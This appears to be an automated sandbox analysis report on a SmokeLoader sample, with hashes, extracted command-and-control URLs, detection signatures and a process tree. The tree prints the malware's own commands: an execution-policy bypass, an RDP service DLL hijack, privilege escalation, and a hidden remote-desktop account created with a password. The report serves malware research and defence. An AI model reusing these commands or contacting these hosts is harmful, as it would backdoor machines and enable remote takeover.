Analysis
-
max time kernel
152s -
max time network
154s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
18-10-2021 13:00
Static task
static1
Behavioral task
behavioral1
Sample
2b858c79a8a7a652f8cb60059eb7a95a.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
2b858c79a8a7a652f8cb60059eb7a95a.exe
Resource
win10-en-20211014
General
-
Target
2b858c79a8a7a652f8cb60059eb7a95a.exe
-
Size
343KB
-
MD5
2b858c79a8a7a652f8cb60059eb7a95a
-
SHA1
e669008a553976d275388ee02e49d5c938a6c27b
-
SHA256
991e3c5fb9946ed0490a723a541bda0f36a9b94fff8a68f6729c15e1044dd954
-
SHA512
c893d061191282d82bb421ef587b5c0dd973a31aec371d1bba6aba83a5a48444bc1660b9aa80d0f8f1f3beceb86825de2b249a0ffb64c905588f11c4a0bae8c9
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 68 3252 powershell.exe 70 3252 powershell.exe 71 3252 powershell.exe 72 3252 powershell.exe 74 3252 powershell.exe 76 3252 powershell.exe 78 3252 powershell.exe 80 3252 powershell.exe 82 3252 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
8D29.exepid process 3960 8D29.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3024 -
Loads dropped DLL 2 IoCs
Processes:
pid process 2484 2484 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2wm1mumu.vz2.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI23C.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0xaqaplq.rah.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1BC.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI21B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI22C.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI24D.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
2b858c79a8a7a652f8cb60059eb7a95a.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2b858c79a8a7a652f8cb60059eb7a95a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2b858c79a8a7a652f8cb60059eb7a95a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2b858c79a8a7a652f8cb60059eb7a95a.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WMIC.exepowershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 0a705db740c1d701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 74 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 70 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 71 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 72 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2b858c79a8a7a652f8cb60059eb7a95a.exepid process 2424 2b858c79a8a7a652f8cb60059eb7a95a.exe 2424 2b858c79a8a7a652f8cb60059eb7a95a.exe 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 3024 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3024 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
2b858c79a8a7a652f8cb60059eb7a95a.exepid process 2424 2b858c79a8a7a652f8cb60059eb7a95a.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeIncreaseQuotaPrivilege 1404 powershell.exe Token: SeSecurityPrivilege 1404 powershell.exe Token: SeTakeOwnershipPrivilege 1404 powershell.exe Token: SeLoadDriverPrivilege 1404 powershell.exe Token: SeSystemProfilePrivilege 1404 powershell.exe Token: SeSystemtimePrivilege 1404 powershell.exe Token: SeProfSingleProcessPrivilege 1404 powershell.exe Token: SeIncBasePriorityPrivilege 1404 powershell.exe Token: SeCreatePagefilePrivilege 1404 powershell.exe Token: SeBackupPrivilege 1404 powershell.exe Token: SeRestorePrivilege 1404 powershell.exe Token: SeShutdownPrivilege 1404 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeSystemEnvironmentPrivilege 1404 powershell.exe Token: SeRemoteShutdownPrivilege 1404 powershell.exe Token: SeUndockPrivilege 1404 powershell.exe Token: SeManageVolumePrivilege 1404 powershell.exe Token: 33 1404 powershell.exe Token: 34 1404 powershell.exe Token: 35 1404 powershell.exe Token: 36 1404 powershell.exe Token: SeDebugPrivilege 3152 powershell.exe Token: SeIncreaseQuotaPrivilege 3152 powershell.exe Token: SeSecurityPrivilege 3152 powershell.exe Token: SeTakeOwnershipPrivilege 3152 powershell.exe Token: SeLoadDriverPrivilege 3152 powershell.exe Token: SeSystemProfilePrivilege 3152 powershell.exe Token: SeSystemtimePrivilege 3152 powershell.exe Token: SeProfSingleProcessPrivilege 3152 powershell.exe Token: SeIncBasePriorityPrivilege 3152 powershell.exe Token: SeCreatePagefilePrivilege 3152 powershell.exe Token: SeBackupPrivilege 3152 powershell.exe Token: SeRestorePrivilege 3152 powershell.exe Token: SeShutdownPrivilege 3152 powershell.exe Token: SeDebugPrivilege 3152 powershell.exe Token: SeSystemEnvironmentPrivilege 3152 powershell.exe Token: SeRemoteShutdownPrivilege 3152 powershell.exe Token: SeUndockPrivilege 3152 powershell.exe Token: SeManageVolumePrivilege 3152 powershell.exe Token: 33 3152 powershell.exe Token: 34 3152 powershell.exe Token: 35 3152 powershell.exe Token: 36 3152 powershell.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeIncreaseQuotaPrivilege 908 powershell.exe Token: SeSecurityPrivilege 908 powershell.exe Token: SeTakeOwnershipPrivilege 908 powershell.exe Token: SeLoadDriverPrivilege 908 powershell.exe Token: SeSystemProfilePrivilege 908 powershell.exe Token: SeSystemtimePrivilege 908 powershell.exe Token: SeProfSingleProcessPrivilege 908 powershell.exe Token: SeIncBasePriorityPrivilege 908 powershell.exe Token: SeCreatePagefilePrivilege 908 powershell.exe Token: SeBackupPrivilege 908 powershell.exe Token: SeRestorePrivilege 908 powershell.exe Token: SeShutdownPrivilege 908 powershell.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeSystemEnvironmentPrivilege 908 powershell.exe Token: SeRemoteShutdownPrivilege 908 powershell.exe Token: SeUndockPrivilege 908 powershell.exe Token: SeManageVolumePrivilege 908 powershell.exe Token: 33 908 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 3024 3024 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 3024 3024 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8D29.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3024 wrote to memory of 3960 3024 8D29.exe PID 3024 wrote to memory of 3960 3024 8D29.exe PID 3960 wrote to memory of 4060 3960 8D29.exe powershell.exe PID 3960 wrote to memory of 4060 3960 8D29.exe powershell.exe PID 4060 wrote to memory of 3972 4060 powershell.exe csc.exe PID 4060 wrote to memory of 3972 4060 powershell.exe csc.exe PID 3972 wrote to memory of 828 3972 csc.exe cvtres.exe PID 3972 wrote to memory of 828 3972 csc.exe cvtres.exe PID 4060 wrote to memory of 1404 4060 powershell.exe powershell.exe PID 4060 wrote to memory of 1404 4060 powershell.exe powershell.exe PID 4060 wrote to memory of 3152 4060 powershell.exe powershell.exe PID 4060 wrote to memory of 3152 4060 powershell.exe powershell.exe PID 4060 wrote to memory of 908 4060 powershell.exe powershell.exe PID 4060 wrote to memory of 908 4060 powershell.exe powershell.exe PID 4060 wrote to memory of 3376 4060 powershell.exe reg.exe PID 4060 wrote to memory of 3376 4060 powershell.exe reg.exe PID 4060 wrote to memory of 2212 4060 powershell.exe reg.exe PID 4060 wrote to memory of 2212 4060 powershell.exe reg.exe PID 4060 wrote to memory of 3292 4060 powershell.exe reg.exe PID 4060 wrote to memory of 3292 4060 powershell.exe reg.exe PID 4060 wrote to memory of 3212 4060 powershell.exe net.exe PID 4060 wrote to memory of 3212 4060 powershell.exe net.exe PID 3212 wrote to memory of 2588 3212 net.exe net1.exe PID 3212 wrote to memory of 2588 3212 net.exe net1.exe PID 4060 wrote to memory of 3896 4060 powershell.exe cmd.exe PID 4060 wrote to memory of 3896 4060 powershell.exe cmd.exe PID 3896 wrote to memory of 3836 3896 cmd.exe cmd.exe PID 3896 wrote to memory of 3836 3896 cmd.exe cmd.exe PID 3836 wrote to memory of 1328 3836 cmd.exe net.exe PID 3836 wrote to memory of 1328 3836 cmd.exe net.exe PID 1328 wrote to memory of 2652 1328 net.exe net1.exe PID 1328 wrote to memory of 2652 1328 net.exe net1.exe PID 4060 wrote to memory of 2184 4060 powershell.exe cmd.exe PID 4060 wrote to memory of 2184 4060 powershell.exe cmd.exe PID 2184 wrote to memory of 1548 2184 cmd.exe cmd.exe PID 2184 wrote to memory of 1548 2184 cmd.exe cmd.exe PID 1548 wrote to memory of 3628 1548 cmd.exe net.exe PID 1548 wrote to memory of 3628 1548 cmd.exe net.exe PID 3628 wrote to memory of 3584 3628 net.exe net1.exe PID 3628 wrote to memory of 3584 3628 net.exe net1.exe PID 2696 wrote to memory of 716 2696 cmd.exe net.exe PID 2696 wrote to memory of 716 2696 cmd.exe net.exe PID 716 wrote to memory of 2468 716 net.exe net1.exe PID 716 wrote to memory of 2468 716 net.exe net1.exe PID 1820 wrote to memory of 1412 1820 cmd.exe net.exe PID 1820 wrote to memory of 1412 1820 cmd.exe net.exe PID 1412 wrote to memory of 1272 1412 net.exe net1.exe PID 1412 wrote to memory of 1272 1412 net.exe net1.exe PID 1404 wrote to memory of 3264 1404 cmd.exe net.exe PID 1404 wrote to memory of 3264 1404 cmd.exe net.exe PID 3264 wrote to memory of 1092 3264 net.exe net1.exe PID 3264 wrote to memory of 1092 3264 net.exe net1.exe PID 3888 wrote to memory of 1900 3888 cmd.exe net.exe PID 3888 wrote to memory of 1900 3888 cmd.exe net.exe PID 1900 wrote to memory of 2072 1900 net.exe net1.exe PID 1900 wrote to memory of 2072 1900 net.exe net1.exe PID 2868 wrote to memory of 3904 2868 cmd.exe net.exe PID 2868 wrote to memory of 3904 2868 cmd.exe net.exe PID 3904 wrote to memory of 1452 3904 net.exe net1.exe PID 3904 wrote to memory of 1452 3904 net.exe net1.exe PID 2976 wrote to memory of 1464 2976 cmd.exe net.exe PID 2976 wrote to memory of 1464 2976 cmd.exe net.exe PID 1464 wrote to memory of 2100 1464 net.exe net1.exe PID 1464 wrote to memory of 2100 1464 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2b858c79a8a7a652f8cb60059eb7a95a.exe"C:\Users\Admin\AppData\Local\Temp\2b858c79a8a7a652f8cb60059eb7a95a.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2424
-
C:\Users\Admin\AppData\Local\Temp\8D29.exeC:\Users\Admin\AppData\Local\Temp\8D29.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vey4tttg\vey4tttg.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABBD.tmp" "c:\Users\Admin\AppData\Local\Temp\vey4tttg\CSC4E7922EF827F41AF9021BEF8D71C1C74.TMP"4⤵PID:828
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3376
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2212
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3292
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2588
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2652
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3584
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:748
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1368
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:2468
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 7R4k4ROY /add1⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 7R4k4ROY /add2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 7R4k4ROY /add3⤵PID:1272
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1092
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
